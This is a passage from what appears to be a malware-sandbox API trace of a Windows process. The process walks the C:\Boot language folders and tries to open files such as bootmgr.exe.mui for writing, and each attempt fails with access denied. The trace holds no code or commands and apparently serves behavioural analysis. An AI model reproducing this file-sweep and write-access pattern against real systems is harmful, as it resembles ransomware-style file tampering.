hHeap=0x20000) returned 1 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.784] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.784] FindFirstFileExW (in: lpFileName="C:\\Boot\\lt-LT\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78610 [0083.784] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.784] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0083.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0083.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.785] AreFileApisANSI () returned 1 [0083.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.785] AreFileApisANSI () returned 1 [0083.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 30 [0083.786] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.786] GetFileType (hFile=0x340) returned 0x1 [0083.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.786] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.786] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.786] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.786] CloseHandle (hObject=0x340) returned 1 [0083.787] AreFileApisANSI () returned 1 [0083.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0083.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 30 [0083.787] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.787] GetLastError () returned 0x5 [0083.787] GetLastError () returned 0x5 [0083.787] SetLastError (dwErrCode=0x5) [0083.787] GetLastError () returned 0x5 [0083.787] SetLastError (dwErrCode=0x5) [0083.787] GetLastError () returned 0x5 [0083.787] SetLastError (dwErrCode=0x5) [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.787] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧❠\x01⺊Ā")) returned 0 [0083.787] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0083.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.788] AreFileApisANSI () returned 1 [0083.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lv-LV", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lv-LV", lpUsedDefaultChar=0x0) returned 14 [0083.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.788] AreFileApisANSI () returned 1 [0083.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lv-LV") returned 14 [0083.789] CreateFileW (lpFileName="C:\\Boot\\lv-LV" (normalized: "c:\\boot\\lv-lv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.789] GetLastError () returned 0x5 [0083.789] GetLastError () returned 0x5 [0083.789] SetLastError (dwErrCode=0x5) [0083.789] GetLastError () returned 0x5 [0083.789] SetLastError (dwErrCode=0x5) [0083.789] GetLastError () returned 0x5 [0083.789] SetLastError (dwErrCode=0x5) [0083.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.789] AreFileApisANSI () returned 1 [0083.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0083.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lv-LV") returned 14 [0083.789] CreateFileW (lpFileName="C:\\Boot\\lv-LV" (normalized: "c:\\boot\\lv-lv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.789] GetLastError () returned 0x5 [0083.789] GetLastError () returned 0x5 [0083.789] SetLastError (dwErrCode=0x5) [0083.789] GetLastError () returned 0x5 [0083.789] SetLastError (dwErrCode=0x5) [0083.789] GetLastError () returned 0x5 [0083.789] SetLastError (dwErrCode=0x5) [0083.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.790] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.790] FindFirstFileExW (in: lpFileName="C:\\Boot\\lv-LV\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78550 [0083.790] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.790] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 